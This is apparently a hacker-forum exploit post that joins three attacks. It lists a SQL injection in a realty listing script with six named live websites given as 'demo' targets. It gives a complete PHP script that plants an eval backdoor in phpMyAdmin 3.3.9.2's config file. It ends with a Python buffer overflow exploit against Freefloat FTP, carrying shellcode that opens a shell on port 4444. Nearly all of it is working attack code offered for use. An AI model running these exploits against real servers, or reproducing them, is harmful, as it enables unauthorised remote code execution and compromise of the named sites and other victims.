Realty Listing System sql Injection Vulnerability


Exploit In File

preview.php?id=
detail.php?id=

Demo Site
http://www.bundyinc.com/preview.php?id=1%27
http://clockworkrealty.com/preview.php?id=1%27
http://www.smithrealtyonline.com/preview.php?id=1%27
http://www.kenkoprealty.com/preview.php?id=1%27
http://www.zoellerag.com/preview.php?id=1%27
http://www.timandjim.com/preview.php?id=1%27

exploit
http://target/%5Bpath%5D/preview.php?id=1

0r
http://target/%5Bpath%5D/detail.php?id=1

Demo
http://target/[path]/detail.php?id=1 Injection Here
http://target/[path]/preview.php?id=1 Injection Here

Remote Code Injection


 i tried to share what i known for who interested...USE RESPONSIBLY.

<?php echo php_sapi_name()!=='cli'?'</pre>':'';

if(php_sapi_name()==='cli'){
    if(!isset($argv[1])){
        output("   Usage\n    ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
        killme();
    }
    $pmaurl = $argv[1];
}else{
    $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code   = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token  = null;
if(!function_exists('curl_init')){
    output('[!] Fatal error. Need cURL!');
    killme();
}
$ch     = curl_init();
$debug  = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))killme(true);
}

output("[i] Running...");

// Start a session and get a token
curl_setopt_array($ch, array(
    CURLOPT_URL => $pmaurl.'/setup/index.php',
    CURLOPT_HEADER => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 4,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrive session cookie and token.");

$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
    output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
    killme();
}
if(!$result){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
    output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
    killme();
}

// Extract cookie
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);

// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
    output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
    output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
    output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
}

curl_close($ch);

function output($msg){
    echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
    flush();
}

function killme(){
    output("[*] Exiting...");
    echo php_sapi_name()!=='cli'?'<pre>':'';
    die();
}

echo php_sapi_name()!=='cli'?'<pre>':'';?>

Freefloat FTP [LIST] Buffer Overflow Exploit


Credit to underground Team @ inj3ctor… we juz do what we thing right to do in virtual world..~~

 

 

#!/usr/bin/python
from struct import pack
import socket,sys
import os

print " ||=============================================================||"
print " ||                                                             ||"
print " ||      /      \    0-Exploit (Zer0 Thunder)                   ||"
print " ||   \  \  ,,  /  /--------------------------------------------||"
print " ||    '-.`\()/`.-'          ===========================        ||"
print " ||   .--_'(  )'_--.Freefloat FTP [LIST] Buffer Overflow Exploit||"
print " ||  / /` /`**`\ `\ \        ----pwn the shell----              ||"
print " ||   |  |  ><  |  |                                            ||"
print " ||   \  \      /  /                                            ||"
print " ||       '.__.'                                                ||"
print " ||                                                             ||"
print " ||=============================================================||"

if len(sys.argv) != 3:
    print "Usage: ./freeftp.py [IP] [PORT]"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

junk = "\x41" * 246
add = pack('<L',0x77c35459)
nops = "\x90" * 20
shell= ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
"\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
"\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"
"\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
"\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
"\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
"\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
"\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
"\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
"\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
"\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
"\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
"\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
"\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
"\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
"\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
"\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
"\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
"\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
payload = junk+add+nops+shell

print "[+] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect=s.connect((target, port))
    print "[+] Target FTP Connected!"
except:
    print "[!] FTP didn't respond\n"
    sys.exit(0)

s.recv(1024)

s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
print "[+] Sending payload..."
s.send('LIST ' + payload + '\r\n')
s.recv(1024)

print "[!] Exploit has been sent!. Please try telnet [target ip] 4444\n"

try:
    s.recv(1024)
    print "[!] Exploit failed !."

except:
    print "[+] Pwned the shell !"

s.close()